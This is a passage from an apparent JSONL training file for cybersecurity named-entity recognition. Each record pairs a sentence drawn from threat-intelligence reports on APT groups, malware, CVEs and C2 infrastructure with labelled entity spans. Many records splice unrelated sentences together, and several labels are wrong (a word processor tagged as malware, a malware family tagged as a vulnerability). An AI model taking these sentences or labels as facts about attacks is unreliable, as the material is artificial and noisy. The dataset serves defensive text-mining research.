
For operational plans development , the combination of threats , vulnerabilities , and impacts must be evaluated in order to identify important trends and decide where effort should be applied to eliminate or reduce threat capabilities eliminate or reduce vulnerabilities and assess , coordinate , and deconflict all cyberspace operations NIST , 2010 .", "spans": {"SYSTEM: Windows": [[63, 70]], "MALWARE: Remy backdoor": [[446, 459]]}, "info": {"id": "cyberner_stix_train_006933", "source": "cyberner_stix_train"}} {"text": "Although a number of actors have distributed Dridex , TA505 operates multiple affiliate IDs , including what appears to be the earliest recorded affiliate , botnet ID 125 .", "spans": {"MALWARE: Dridex": [[45, 51]], "THREAT_ACTOR: TA505": [[54, 59]]}, "info": {"id": "cyberner_stix_train_006934", "source": "cyberner_stix_train"}} {"text": "] website mobilestoreupdate [ . The Elfin espionage group ( aka APT33 ) has remained highly active over the past three years , attacking at least 50 organizations in Saudi Arabia , the United States , and a range of other countries . The Remexi developers seem to rely on legitimate Microsoft utilities, which we enumerate in the table below: extract.exe Deploys modules from the .cab file into the working Event Cache directory, bitsadmin.exe Fetches files from the C2 server to parse and execute . 
However , even though the employees work for you they may feel the companys property belongs to them , not the business , and may feel justified in theft .", "spans": {"THREAT_ACTOR: Elfin": [[36, 41]], "THREAT_ACTOR: espionage group": [[42, 57]], "THREAT_ACTOR: APT33": [[64, 69]], "ORGANIZATION: Microsoft": [[283, 292]], "FILEPATH: extract.exe": [[343, 354]], "FILEPATH: .cab": [[380, 384]], "FILEPATH: bitsadmin.exe": [[430, 443]], "TOOL: C2": [[467, 469]]}, "info": {"id": "cyberner_stix_train_006935", "source": "cyberner_stix_train"}} {"text": "Like many original equipment manufacturers , it uses software components from other developers . Once on the Visma network , APT10 attackers used the Microsoft BITSAdmin CLI tool to copy malicious tools from a suspected attacker-controlled C2 hosted on 173.254.236[.]158 to the \\ProgramData\\temp\\ directory on the infected host . Invader : e9574627349aeb7dd7f5b9f9c5ede7faa06511d7fdf98804526ca1b2e7ce127e .", "spans": {"TOOL: Visma network": [[109, 122]], "THREAT_ACTOR: APT10": [[125, 130]], "TOOL: BITSAdmin": [[160, 169]], "MALWARE: Invader": [[330, 337]], "FILEPATH: e9574627349aeb7dd7f5b9f9c5ede7faa06511d7fdf98804526ca1b2e7ce127e": [[340, 404]]}, "info": {"id": "cyberner_stix_train_006936", "source": "cyberner_stix_train"}} {"text": "The Flash object must contact an active C2 server to download an additional Flash object containing exploit code ;", "spans": {"TOOL: Flash": [[4, 9], [76, 81]], "TOOL: C2": [[40, 42]]}, "info": {"id": "cyberner_stix_train_006937", "source": "cyberner_stix_train"}} {"text": "on Feb 28 , 2016 . Ke3chang has also leveraged a Java zero-day vulnerability ( CVE-2012-4681 ) , as well as older , reliable exploits for Microsoft Word ( CVE-2010-3333 ) and Adobe PDF Reader ( CVE-2010-2883 ) . 
Entities in these sectors are often \" enabling victims \" as telecommunications providers or IT services agencies and vendors could provide Seedworm actors with further victims to compromise .", "spans": {"THREAT_ACTOR: Ke3chang": [[19, 27]], "VULNERABILITY: Java zero-day vulnerability": [[49, 76]], "VULNERABILITY: CVE-2012-4681": [[79, 92]], "MALWARE: Microsoft Word": [[138, 152]], "VULNERABILITY: CVE-2010-3333": [[155, 168]], "TOOL: Adobe PDF Reader": [[175, 191]], "VULNERABILITY: CVE-2010-2883": [[194, 207]], "ORGANIZATION: telecommunications providers": [[272, 300]], "ORGANIZATION: IT services agencies": [[304, 324]], "THREAT_ACTOR: Seedworm actors": [[351, 366]]}, "info": {"id": "cyberner_stix_train_006938", "source": "cyberner_stix_train"}} {"text": "Finally , the malware downloads the next stage payload , decrypting it and possibly executing it with the Print parameter .", "spans": {}, "info": {"id": "cyberner_stix_train_006939", "source": "cyberner_stix_train"}} {"text": "The folders seem to contain information about the company 's development documentation , artificial intelligence model , web security software , and antivirus software base code . Attackers are targeting Windows platform and aiming at government institutions as well as big companies in Colombia .", "spans": {"TOOL: folders": [[4, 11]], "SYSTEM: Windows": [[204, 211]], "ORGANIZATION: government institutions": [[235, 258]]}, "info": {"id": "cyberner_stix_train_006940", "source": "cyberner_stix_train"}} {"text": "Talos assesses with high confidence that Group 123 was responsible for six campaigns . 
These campaign-related VPSs are located in South Africa .", "spans": {"ORGANIZATION: Talos": [[0, 5]], "THREAT_ACTOR: Group 123": [[41, 50]], "TOOL: VPSs": [[110, 114]]}, "info": {"id": "cyberner_stix_train_006941", "source": "cyberner_stix_train"}} {"text": "Whitefly usually attempts to remain within a targeted organization for long periods of time—often months—in order to steal large volumes of information . This vulnerability was discovered by FireEye in September 2017 , and it is a vulnerability we have observed being exploited in the wild .", "spans": {"THREAT_ACTOR: Whitefly": [[0, 8]], "VULNERABILITY: vulnerability": [[159, 172]], "ORGANIZATION: FireEye": [[191, 198]]}, "info": {"id": "cyberner_stix_train_006942", "source": "cyberner_stix_train"}} {"text": "Sofacy is known for making extensive use of phishing attacks to lure targets into revealing their credentials via realistic reconstruction of internal systems , such as webmails , as employed against the Georgian Ministry of Internal Affairs in the infamous attacks that preceded the Georgian invasion of 2008 .", "spans": {"THREAT_ACTOR: Sofacy": [[0, 6]], "ORGANIZATION: Georgian Ministry of Internal Affairs": [[204, 241]]}, "info": {"id": "cyberner_stix_train_006943", "source": "cyberner_stix_train"}} {"text": "The only sample was found on public repositories and almost seemed to indicate a test run to determine the detection ratio of the sample . LYCEUM deployed this tool via DanBot shortly after gaining initial access to a compromised environment . 
APT38 , in particular , is strongly distinguishable because of its specific focus on financial institutions and operations that attempt to use SWIFT fraud to steal millions of dollars at a time .", "spans": {"THREAT_ACTOR: LYCEUM": [[139, 145]], "TOOL: DanBot": [[169, 175]], "THREAT_ACTOR: APT38": [[244, 249]], "ORGANIZATION: financial institutions": [[329, 351]], "MALWARE: SWIFT": [[387, 392]]}, "info": {"id": "cyberner_stix_train_006944", "source": "cyberner_stix_train"}} {"text": "Most devices can be controlled by Xiaomi ’ s “ MiHome ” Android app , which is available on Google Play with between 1,000,000 and 5,000,000 downloads . In 2014 , APT41 compromised an online billing/payment service using VPN access between a third-party service provider and the targeted payment service . In 2013 , the Sofacy group expanded their arsenal and added more backdoors and tools , including CORESHELL , SPLM ( aka Xagent , aka CHOPSTICK ) , JHUHUGIT ( which is built with code from the Carberp sources ) , AZZY ( aka ADVSTORESHELL , NETUI , EVILTOSS , and spans across 4-5 generations ) and a few others .", "spans": {"ORGANIZATION: Xiaomi": [[34, 40]], "SYSTEM: MiHome": [[47, 53]], "SYSTEM: Android": [[56, 63]], "SYSTEM: Google Play": [[92, 103]], "THREAT_ACTOR: APT41": [[163, 168]], "ORGANIZATION: service provider": [[254, 270]], "ORGANIZATION: payment": [[288, 295]], "ORGANIZATION: service": [[296, 303]], "THREAT_ACTOR: Sofacy group": [[320, 332]], "MALWARE: CORESHELL": [[403, 412]], "MALWARE: SPLM": [[415, 419]], "MALWARE: Xagent": [[426, 432]], "MALWARE: CHOPSTICK": [[439, 448]], "MALWARE: JHUHUGIT": [[453, 461]], "MALWARE: Carberp": [[498, 505]], "MALWARE: AZZY": [[518, 522]], "MALWARE: EVILTOSS": [[553, 561]]}, "info": {"id": "cyberner_stix_train_006945", "source": "cyberner_stix_train"}} {"text": "Figure 7 . Most of these data-stealing capabilities were present in the oldest variants of CARBANAK that we have seen and some were added over time . 
Umbrella , our secure internet gateway (SIG) , blocks users from connecting to malicious domains , IPs , and URLs , whether users are on or off the corporate network .", "spans": {"MALWARE: CARBANAK": [[91, 99]], "ORGANIZATION: Umbrella": [[150, 158]]}, "info": {"id": "cyberner_stix_train_006946", "source": "cyberner_stix_train"}} {"text": "It seems that the malware authors produced and delivered malware that only works on specific systems based on previously collected information .", "spans": {}, "info": {"id": "cyberner_stix_train_006947", "source": "cyberner_stix_train"}} {"text": "In addition , the network beacon traffic for the new malware resembles those used by the CORESHELL backdoor .", "spans": {"MALWARE: CORESHELL backdoor": [[89, 107]]}, "info": {"id": "cyberner_stix_train_006948", "source": "cyberner_stix_train"}} {"text": "The group has demonstrated access to zero-day vulnerabilities (CVE-2018-0802) , and the ability to incorporate them into operations . The usefulness of flare-qdb can be seen in cases such as loops dealing with strings .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "VULNERABILITY: (CVE-2018-0802)": [[62, 77]], "FILEPATH: flare-qdb": [[152, 161]]}, "info": {"id": "cyberner_stix_train_006949", "source": "cyberner_stix_train"}} {"text": "After further analysis , it was discovered that the RTF files were exploiting the CVE-2018-0798 vulnerability in Microsoft’s Equation Editor (EQNEDT32) . 
In the Bahamut report , we discussed two domains found within our search that were linked with a custom Android malware agent .", "spans": {"MALWARE: RTF files": [[52, 61]], "VULNERABILITY: CVE-2018-0798": [[82, 95]], "MALWARE: domains": [[195, 202]], "MALWARE: custom Android malware agent": [[251, 279]]}, "info": {"id": "cyberner_stix_train_006950", "source": "cyberner_stix_train"}} {"text": "These three macOS installers use a similar post installer script in order to implant a mach-o payload , as well as using the same command-line argument when executing the fetched second-stage payload .", "spans": {"SYSTEM: macOS": [[12, 17]], "TOOL: mach-o": [[87, 93]]}, "info": {"id": "cyberner_stix_train_006951", "source": "cyberner_stix_train"}} {"text": "According to the build path ( Z:\\Loader\\x64\\Release\\WinloaderExe.pdb ) , the malware author called this malware a loader .", "spans": {}, "info": {"id": "cyberner_stix_train_006952", "source": "cyberner_stix_train"}} {"text": "The dropper and the payload are quite similar to the previous versions but the author modified some public information such as MUTEX name , obfuscation .", "spans": {}, "info": {"id": "cyberner_stix_train_006953", "source": "cyberner_stix_train"}} {"text": "This campaign , like later CozyDuke campaigns , began with spear-phishing emails that tried to impersonate commonly seen spam emails .", "spans": {"MALWARE: CozyDuke": [[27, 35]], "TOOL: emails": [[74, 80], [126, 132]]}, "info": {"id": "cyberner_stix_train_006954", "source": "cyberner_stix_train"}} {"text": "The decompile method is based on the fact that Android applications are Java-based , meaning it is possible to recompile it . As noted in our previous blog on Buhtrap , this gang has been actively targeting Russian businesses , mostly through spear-phishing . The installer downloads an MSI package from one of the two URLs , and then launches msiexec.exe to perform a silent install . 
As we have seen over the years , SocGholish is an established player that has managed to compromise countless victims and deliver ransomware after facilitating the installation of tools like Cobalt Strike or Mimikatz .", "spans": {"SYSTEM: Android": [[47, 54]], "ORGANIZATION: businesses": [[215, 225]], "TOOL: MSI": [[287, 290]], "FILEPATH: msiexec.exe": [[344, 355]], "TOOL: Cobalt Strike": [[577, 590]], "TOOL: Mimikatz": [[594, 602]]}, "info": {"id": "cyberner_stix_train_006955", "source": "cyberner_stix_train"}} {"text": "The table below shows the commands available to the operator for tasking on infected devices . The attack leveraged malware we called ' BlackLambert ' , which was used to target a high profile organization in Europe . The attackers primarily use malicious .PDF files that exploit vulnerabilities in Adobe Reader , Acrobat , and Flash Player , including the use of two zero-day exploits—one in 2009 and another in 2011 . Our gathered field data shows the following statistics on CSP usage across the Internet ( based on HTTPArchive March 2020 scan ):", "spans": {"TOOL: BlackLambert": [[136, 148]], "ORGANIZATION: high profile organization": [[180, 205]], "FILEPATH: .PDF": [[256, 260]], "TOOL: Adobe Reader": [[299, 311]], "TOOL: Acrobat": [[314, 321]], "TOOL: Flash Player": [[328, 340]], "VULNERABILITY: zero-day": [[368, 376]], "ORGANIZATION: CSP": [[478, 481]]}, "info": {"id": "cyberner_stix_train_006956", "source": "cyberner_stix_train"}} {"text": "If the system is deemed interesting , the next stage malware would be delivered into corresponding directories .", "spans": {}, "info": {"id": "cyberner_stix_train_006957", "source": "cyberner_stix_train"}} {"text": "The hook gets windows messages indicating when a network drive has been attached .", "spans": {"SYSTEM: windows": [[14, 21]]}, "info": {"id": "cyberner_stix_train_006958", "source": "cyberner_stix_train"}} {"text": "One chunk contains the entire malware DLL code ( without PE headers ) . 
This cyber-espionage group was dubbed ' Rocket Kitten ' , and remains active as of this writing , with reported attacks as recent as October 2015 . The final payload comes in a form of a launcher DLL that contains an encrypted backdoor in its .rdata section and a plain-text configuration in its resources . Astamirov is now facing charges of wire fraud and of intentionally damaging protected computers , plus he 's accused of making ransom demands through deploying ransomware .", "spans": {"THREAT_ACTOR: cyber-espionage group": [[77, 98]], "THREAT_ACTOR: Rocket Kitten": [[112, 125]], "TOOL: DLL": [[268, 271]], "ORGANIZATION: Astamirov": [[380, 389]]}, "info": {"id": "cyberner_stix_train_006959", "source": "cyberner_stix_train"}} {"text": "This opens the door to , for example , fully controlling the victim ’ s bank account . This campaign used the abovementioned .html file , malicious Excel/Word document VBA macro , the FlawedAmmyy payload , and Amadey . This new campaign , dubbed HaoBao , resumes Lazarus ' previous phishing emails , posed as employee recruitment , but now targets financial organizations .", "spans": {"TOOL: macro": [[172, 177]], "TOOL: FlawedAmmyy payload": [[184, 203]], "TOOL: Amadey": [[210, 216]], "THREAT_ACTOR: Lazarus": [[263, 270]], "TOOL: emails": [[291, 297]], "ORGANIZATION: financial organizations": [[348, 371]]}, "info": {"id": "cyberner_stix_train_006960", "source": "cyberner_stix_train"}} {"text": "To make this data harvesting operation flexible , SWAnalytics equips the ability to receive and process configuration files from a remote Command-and-Control . OSX Malware Linked to Operation Emmental Hijacks User Network Traffic .", "spans": {"MALWARE: SWAnalytics": [[50, 61]], "SYSTEM: OSX": [[160, 163]], "MALWARE: Malware": [[164, 171]]}, "info": {"id": "cyberner_stix_train_006961", "source": "cyberner_stix_train"}} {"text": "After successful installation , tap Open and enable the device administrator . 
We believe that the Sea Turtle campaign continues to be highly successful for several reasons . APT37 has also been linked to following campaigns between 2016-2018 : Operation Daybreak , Operation Erebus , Golden Time , Evil New Year , Are you Happy? , FreeMilk , Northern Korean Human Rights , and Evil New Year 2018 .", "spans": {"ORGANIZATION: We": [[79, 81]], "THREAT_ACTOR: APT37": [[175, 180]]}, "info": {"id": "cyberner_stix_train_006962", "source": "cyberner_stix_train"}} {"text": "Once in their possession , the actors use these compromised payment card credentials to generate further card information . APT threat actors , most likely nation state-sponsored , targeted a diplomat in the French Ministry of Foreign Affairs with a seemingly legitimate invitation to a technology conference in Taiwan .", "spans": {"THREAT_ACTOR: actors": [[31, 37]], "THREAT_ACTOR: APT threat actors": [[124, 141]], "ORGANIZATION: diplomat": [[192, 200]]}, "info": {"id": "cyberner_stix_train_006963", "source": "cyberner_stix_train"}} {"text": "Appendix Samples Some of the latest Cerberus samples found in the wild : App name Package name SHA 256 hash Flash Player com.uxlgtsvfdc.zipvwntdy 728a6ea44aab94a2d0ebbccbf0c1b4a93fbd9efa8813c19a88d368d6a46b4f4f Flash Player com.ognbsfhszj.hqpquokjdp fe28aba6a942b6713d7142117afdf70f5e731c56eff8956ecdb40cdc28c7c329 The SectorJ04 group , which has been utilizing the same pattern of infection and the same malware for more than six months , is believed to be attempting to change its infection methods such as downloading malware directly from malicious documents without using MSI installation files , changing their spam email format and using new types of backdoor . 
BRONZE BUTLER compromises organizations to conduct cyberespionage , primarily focusing on Japan .", "spans": {"MALWARE: Cerberus": [[36, 44]], "SYSTEM: Flash Player": [[108, 120], [211, 223]], "THREAT_ACTOR: SectorJ04": [[319, 328]], "THREAT_ACTOR: BRONZE BUTLER": [[669, 682]], "THREAT_ACTOR: cyberespionage": [[720, 734]]}, "info": {"id": "cyberner_stix_train_006964", "source": "cyberner_stix_train"}} {"text": "The overarching campaign appears to target both Chinese nationals within different industries and government agencies in Southern Asia . This threat report gives insight into some of the information that Fox-IT has about a threat actor that it follows , called Mofang .", "spans": {"ORGANIZATION: government agencies": [[98, 117]], "ORGANIZATION: Fox-IT": [[204, 210]], "THREAT_ACTOR: Mofang": [[261, 267]]}, "info": {"id": "cyberner_stix_train_006965", "source": "cyberner_stix_train"}} {"text": "In addition to the following step-by-step process illustrates how Cannon communicates with the actor-controlled C2 email address to obtain a secondary payload .", "spans": {"MALWARE: Cannon": [[66, 72]], "TOOL: C2": [[112, 114]], "TOOL: email": [[115, 120]]}, "info": {"id": "cyberner_stix_train_006966", "source": "cyberner_stix_train"}} {"text": "Dropping Elephant ( also known as \" Chinastrats \" and \" Patchwork \" ) is a relatively new threat actor that is targeting a variety of high profile diplomatic and economic targets using a custom set of attack tools . 
These operations involved highly targeted email lures with repurposed content and attachments that contained an updated version of KeyBoy .", "spans": {"THREAT_ACTOR: Dropping Elephant": [[0, 17]], "THREAT_ACTOR: Chinastrats": [[36, 47]], "THREAT_ACTOR: Patchwork": [[56, 65]], "THREAT_ACTOR: threat actor": [[90, 102]], "ORGANIZATION: diplomatic": [[147, 157]], "ORGANIZATION: economic": [[162, 170]], "MALWARE: email lures": [[258, 269]], "MALWARE: KeyBoy": [[347, 353]]}, "info": {"id": "cyberner_stix_train_006967", "source": "cyberner_stix_train"}} {"text": "Sensitive bank documents have be found on the servers that were controlling Carbanak . this attack against a Kaspersky Lab user on August 5 , 2014 .", "spans": {"VULNERABILITY: Carbanak": [[76, 84]], "ORGANIZATION: Kaspersky Lab": [[109, 122]]}, "info": {"id": "cyberner_stix_train_006968", "source": "cyberner_stix_train"}} {"text": "The credentials they use to register their malware infrastructure are easily associated with their public social media accounts on Google® , Facebook® , MySpace® , Instagram® , and various dating and blogging sites . VAMP targeted various types of data from the phones of victims : images , text messages , contacts , and call history , among others .", "spans": {"ORGANIZATION: social media": [[106, 118]], "ORGANIZATION: Google®": [[131, 138]], "ORGANIZATION: Facebook®": [[141, 150]], "ORGANIZATION: MySpace®": [[153, 161]], "ORGANIZATION: Instagram®": [[164, 174]], "ORGANIZATION: dating and blogging sites": [[189, 214]], "MALWARE: VAMP": [[217, 221]]}, "info": {"id": "cyberner_stix_train_006970", "source": "cyberner_stix_train"}} {"text": "The use of weaponized legitimate documents is a longstanding operational standard of Patchwork . 
It is highly likely that the Mofang group is a group that operates out of China and is probably government-affiliated .", "spans": {"TOOL: weaponized legitimate documents": [[11, 42]], "THREAT_ACTOR: Patchwork": [[85, 94]], "THREAT_ACTOR: Mofang group": [[126, 138]]}, "info": {"id": "cyberner_stix_train_006971", "source": "cyberner_stix_train"}} {"text": "Data was always sent to the C & C server via HTTP in the body of a POST request in encrypted form to the relative address /something/index.php . CTU researchers have evidence that the threat group compromised U.S and UK organizations in the following verticals : manufacturing ( specifically aerospace ( including defense contractors ) , automotive , technology , energy , and pharmaceuticals ) , education , and legal , as well as organizations focused on international relations . These new samples targeted Linux- and Unix-based operating systems , vulnerable servers , and internet of things ( IoT ) devices by exploiting known vulnerabilities with available exploits . The customers of these commercial spyware organizations know who their victim(s ) are .", "spans": {"ORGANIZATION: CTU": [[145, 148]], "ORGANIZATION: manufacturing": [[263, 276]], "ORGANIZATION: aerospace": [[292, 301]], "ORGANIZATION: defense contractors": [[314, 333]], "ORGANIZATION: automotive": [[338, 348]], "ORGANIZATION: technology": [[351, 361]], "ORGANIZATION: energy": [[364, 370]], "ORGANIZATION: pharmaceuticals": [[377, 392]], "ORGANIZATION: education": [[397, 406]], "ORGANIZATION: legal": [[413, 418]], "SYSTEM: Linux-": [[510, 516]], "SYSTEM: Unix-based operating systems": [[521, 549]]}, "info": {"id": "cyberner_stix_train_006972", "source": "cyberner_stix_train"}} {"text": "After downloading and unpacking , the main module executes the exploit binary file . The dropped PE file has the distinctive file name 8.t” . 
Tropic Trooper focuses on targeting government , healthcare , transportation , and high-tech industries and has been active since 2011 .", "spans": {"TOOL: PE": [[97, 99]], "MALWARE: 8.t”": [[135, 139]], "THREAT_ACTOR: Tropic Trooper": [[142, 156]], "ORGANIZATION: government": [[178, 188]]}, "info": {"id": "cyberner_stix_train_006973", "source": "cyberner_stix_train"}} {"text": "Claudio Guarnieri , a security researcher who has investigated Hacking Team along with others at the Citizen Lab , was quick to point this out . Nevertheless , resourceful threat actors such as ScarCruft will probably continue to deploy zero-day exploits against their high profile targets .", "spans": {"ORGANIZATION: Claudio Guarnieri": [[0, 17]], "ORGANIZATION: Citizen Lab": [[101, 112]], "THREAT_ACTOR: ScarCruft": [[194, 203]], "VULNERABILITY: zero-day": [[237, 245]]}, "info": {"id": "cyberner_stix_train_006974", "source": "cyberner_stix_train"}} {"text": "Microsoft reiterates that the PLATINUM tool does not expose flaws in Intel® Active Management Technology ( AMT ) , but uses the technology within an already compromised network to evade security monitoring tools . Attackers are sending malicious PDF and DOC files , which use exploits to drop variants of Backdoor.Sogu .", "spans": {"ORGANIZATION: Microsoft": [[0, 9]], "THREAT_ACTOR: PLATINUM": [[30, 38]], "TOOL: Intel® Active Management Technology": [[69, 104]], "TOOL: AMT": [[107, 110]], "MALWARE: PDF": [[246, 249]], "MALWARE: DOC files": [[254, 263]], "MALWARE: Backdoor.Sogu": [[305, 318]]}, "info": {"id": "cyberner_stix_train_006975", "source": "cyberner_stix_train"}} {"text": "] infogooogel-drive [ . Considering the language being used in the malicious code is Arabic , it seems that the attacker is familiar with Arabic language as well . This saves the intruder from having to manually edit webpages . 
Adversaries may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": {"THREAT_ACTOR: Adversaries": [[228, 239]]}, "info": {"id": "cyberner_stix_train_006976", "source": "cyberner_stix_train"}} {"text": "This section contains network signatures and host-based rules that can be used to detect malicious activity associated with HIDDEN COBRA actors .", "spans": {"TOOL: network signatures": [[22, 40]], "TOOL: host-based rules": [[45, 61]], "THREAT_ACTOR: HIDDEN COBRA": [[124, 136]]}, "info": {"id": "cyberner_stix_train_006977", "source": "cyberner_stix_train"}} {"text": "Windows 10 S devices are naturally protected against FinFisher and other threats thanks to the strong code integrity policies that don ’ t allow unknown unsigned binaries to run ( thus stopping FinFisher ’ s PE installer ) or loaded ( blocking FinFisher ’ s DLL persistence ) . menuPass is an ongoing APT campaign with a broad range of targets and will likely continue to target Japan in the future . OceanLotus : 0 config varies content is read from resource P1/1 . 
In one of our previous blog entries , we covered how the threat actor known as Winnti was using GitHub to spread malware – a development that shows how the group is starting to evolve and use new attack methods beyond their previous tactics involving targeted attacks against gaming , pharmaceutical , and telecommunications companies .", "spans": {"SYSTEM: Windows 10": [[0, 10]], "MALWARE: FinFisher": [[53, 62], [194, 203], [244, 253]], "THREAT_ACTOR: OceanLotus": [[401, 411]], "THREAT_ACTOR: threat actor": [[524, 536]], "THREAT_ACTOR: Winnti": [[546, 552]], "THREAT_ACTOR: the group": [[619, 628]], "ORGANIZATION: gaming , pharmaceutical , and telecommunications companies": [[743, 801]]}, "info": {"id": "cyberner_stix_train_006978", "source": "cyberner_stix_train"}} {"text": "These devices were located in the following countries : How we protect you To protect Android devices and users , Google Play provides a complete set of security services that update outside of platform releases . Symantec identified two strains of custom malware used by the Leafminer group : Trojan.Imecab and Backdoor.Sorgu . Given that these attacks were mostly targeted against Asia and the gaming industry , it shouldn’t be surprising they are the work of the group described in Kaspersky ’s “ Winnti – More than just a game ” . Geographically , most victims are located in Europe , specifically Italy .", "spans": {"SYSTEM: Android": [[86, 93]], "SYSTEM: Google Play": [[114, 125]], "ORGANIZATION: Symantec": [[214, 222]], "THREAT_ACTOR: Leafminer group": [[276, 291]], "TOOL: Trojan.Imecab": [[294, 307]], "TOOL: Backdoor.Sorgu": [[312, 326]], "ORGANIZATION: Kaspersky": [[485, 494]], "THREAT_ACTOR: Winnti": [[500, 506]]}, "info": {"id": "cyberner_stix_train_006979", "source": "cyberner_stix_train"}} {"text": "The group previous activities against financial and policy organizations have largely focused on spear phishing emails written in English , destined for Western audiences . 
In October 2015 , the Callisto Group was observed sending targeted credential phishing emails .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "ORGANIZATION: financial": [[38, 47]], "ORGANIZATION: policy organizations": [[52, 72]], "ORGANIZATION: audiences": [[161, 170]], "THREAT_ACTOR: Callisto Group": [[195, 209]], "TOOL: emails": [[260, 266]]}, "info": {"id": "cyberner_stix_train_006980", "source": "cyberner_stix_train"}} {"text": "The domain go-microstf.com was originally set up to spoof Google Analytics login page .", "spans": {"DOMAIN: go-microstf.com": [[11, 26]], "TOOL: Google Analytics": [[58, 74]]}, "info": {"id": "cyberner_stix_train_006981", "source": "cyberner_stix_train"}} {"text": "After compromising a system , typically by installing Powermud or Powemuddy , Seedworm first runs a tool that steals passwords saved in users ' web browsers and email , demonstrating that access to the victim 's email , social media , and chat accounts is one of their likely goals . Adversary behavioral artifacts further suggest the TEMP.Veles operators are based in Moscow , lending some further support to the scenario that CNIIHM , a Russian research organization in Moscow , has been involved in TEMP.Veles activity .", "spans": {"TOOL: Powermud": [[54, 62]], "TOOL: Powemuddy": [[66, 75]], "THREAT_ACTOR: Seedworm": [[78, 86]], "THREAT_ACTOR: TEMP.Veles": [[335, 345], [502, 512]], "THREAT_ACTOR: CNIIHM": [[428, 434]], "ORGANIZATION: research organization": [[447, 468]]}, "info": {"id": "cyberner_stix_train_006982", "source": "cyberner_stix_train"}} {"text": "The first version of Proyecto RAT” was published at the end of 2010 . 
We identified an overlap in the domain voguextra.com , which was used by Bahamut within their \" Devoted To Humanity \" app to host an image file and as C2 server by the PrayTime iOS app mentioned in our first post .", "spans": {"MALWARE: Proyecto RAT”": [[21, 34]], "THREAT_ACTOR: Bahamut": [[143, 150]], "FILEPATH: Devoted To Humanity": [[166, 185]], "TOOL: C2": [[221, 223]]}, "info": {"id": "cyberner_stix_train_006984", "source": "cyberner_stix_train"}} {"text": "In all of these cases , we operate under strict confidentiality rules with our customers and cannot reveal publicly any information about these attacks .", "spans": {}, "info": {"id": "cyberner_stix_train_006985", "source": "cyberner_stix_train"}} {"text": "FANCY BEAR adversary used different tradecraft , deploying X-Agent malware with capabilities to do remote command execution , file transmission and keylogging .", "spans": {"THREAT_ACTOR: FANCY BEAR": [[0, 10]], "MALWARE: X-Agent": [[59, 66]]}, "info": {"id": "cyberner_stix_train_006986", "source": "cyberner_stix_train"}} {"text": "These exploits still plague many devices today because security patches that fix them may not be available for some versions of Android , or the patches were never installed by the user . A well-funded , highly active BlackOasis group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group . We also observed a pattern that was also using an 8-bit portion of the register . 
Depending on the campaign , the final payload or the third intermediate stage is appended as an encrypted binary blob to the end of the image .", "spans": {"SYSTEM: Android": [[128, 135]], "THREAT_ACTOR: BlackOasis group": [[218, 234]], "THREAT_ACTOR: hackers": [[253, 260]], "VULNERABILITY: zero-day exploit": [[304, 320]], "THREAT_ACTOR: Gamma Group": [[446, 457]]}, "info": {"id": "cyberner_stix_train_006987", "source": "cyberner_stix_train"}} {"text": "Talos said the perpetrators of DNSpionage were able to steal email and other login credentials from a number of government and private sector entities in Lebanon and the United Arab Emirates by hijacking the DNS servers for these targets , so that all email and virtual private networking ( VPN ) traffic was redirected to an Internet address controlled by the attackers . CTU researchers have observed the threat actors installing a credential logger and backdoor on Microsoft Exchange servers , which requires a technical grasp of Internet Information Services ( IIS ) .", "spans": {"ORGANIZATION: Talos": [[0, 5]], "ORGANIZATION: government": [[112, 122]], "TOOL: VPN": [[291, 294]], "ORGANIZATION: CTU": [[373, 376]], "MALWARE: credential logger": [[434, 451]], "ORGANIZATION: Microsoft": [[468, 477]], "TOOL: Internet Information Services": [[533, 562]], "TOOL: IIS": [[565, 568]]}, "info": {"id": "cyberner_stix_train_006988", "source": "cyberner_stix_train"}} {"text": "The stolen data fields are : Mobile - The infected device phone number Machine - The device model ( in our example : Google Pixel 2 ) Sversion - The OS version Bank - Checks if there are any banking-related or cryptocurrency trading apps Provider - The telecommunication provider ( IMSI value in device settings ) npki - Checks if the folder named NPKI ( National Public Key Infrastructure ) might contain authentication certificates related to financial transactions onStartCommand function for stealing device information and additional sensitive data . 
The Emissary Panda threat group loaded the China Chopper webshell onto SharePoint servers at two Government organizations in the Middle East , which we believe with high confidence involved exploiting a remote code execution vulnerability in SharePoint tracked in CVE-2019-0604 . Each attack comprises a variety of phases , including reconnaissance , exploitation , command and control , lateral movement , and Exfiltration .", "spans": {"SYSTEM: Google Pixel 2": [[117, 131]], "THREAT_ACTOR: Emissary Panda": [[560, 574]], "TOOL: China Chopper": [[599, 612]], "VULNERABILITY: CVE-2019-0604": [[820, 833]]}, "info": {"id": "cyberner_stix_train_006989", "source": "cyberner_stix_train"}} {"text": "In the past year , FireEye iSIGHT Intelligence has discovered newly developed wiper malware being deployed by TEMP.Reaper , which we detect as RUHAPPY . CraP2P has frequently been used to distribute other malware such as Locky and Dridex , but also supported large scale spam campaigns for dating advertisement and pump-and-dump scams after the demise of Kelihos .", "spans": {"ORGANIZATION: FireEye iSIGHT": [[19, 33]], "THREAT_ACTOR: TEMP.Reaper": [[110, 121]], "FILEPATH: CraP2P": [[153, 159]], "MALWARE: Locky": [[221, 226]], "MALWARE: Dridex": [[231, 237]]}, "info": {"id": "cyberner_stix_train_006990", "source": "cyberner_stix_train"}} {"text": "If the argument -SSL is given through command-line to the artifact , these beacons will be encapsulated in an SSL connection and a proper TLS handshake will be initiated with the C&C .", "spans": {"TOOL: C&C": [[179, 182]]}, "info": {"id": "cyberner_stix_train_006991", "source": "cyberner_stix_train"}} {"text": "These PDFs would attempt to silently infect the recipient with MiniDuke , while distracting them by displaying a decoy document .", "spans": {"TOOL: PDFs": [[6, 10]], "MALWARE: MiniDuke": [[63, 71]]}, "info": {"id": "cyberner_stix_train_006992", "source": "cyberner_stix_train"}} {"text": "CTU researchers assess with high confidence 
